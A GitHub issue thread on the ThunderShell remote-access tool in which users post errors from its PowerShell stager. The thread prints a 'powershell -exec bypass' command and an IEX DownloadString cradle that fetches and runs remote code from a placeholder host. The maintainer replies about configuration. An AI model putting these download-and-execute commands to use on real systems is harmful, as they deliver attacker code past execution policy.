### ISSUE TITLE
after last commit we got big problem

### ISSUE THREAD

**Issue by itman224** [Mr-Un1k0d3r/ThunderShell#28]
powershell -exec bypass -file GTPNOuLxIXkV.ps1
Exception calling "ELbc" with "3" argument(s): "The operation has timed out"
At C:\Users\Agent\Downloads\GTPNOuLxIXkV.ps1:1 char:14289
+ ... age CSharp; [NUgvFrTpmsBzLxV.MTBqhB]::ELbc("https://test:8080 ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

---------------------------
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://test:8080/cat.png')
Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString('http://test:80 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

**Comment by Mr-Un1k0d3r** [comment]
it seems like your configuration file is not configured properly. http://test:8080/cat.png is unreachable as stated by the error message `"Unable to connect to the remote server"`

**Comment by pasoles** [comment]
Me too I m facing some similar issues.

In Kali machines I cant run the server with httpd, I get port already in use (while its not).
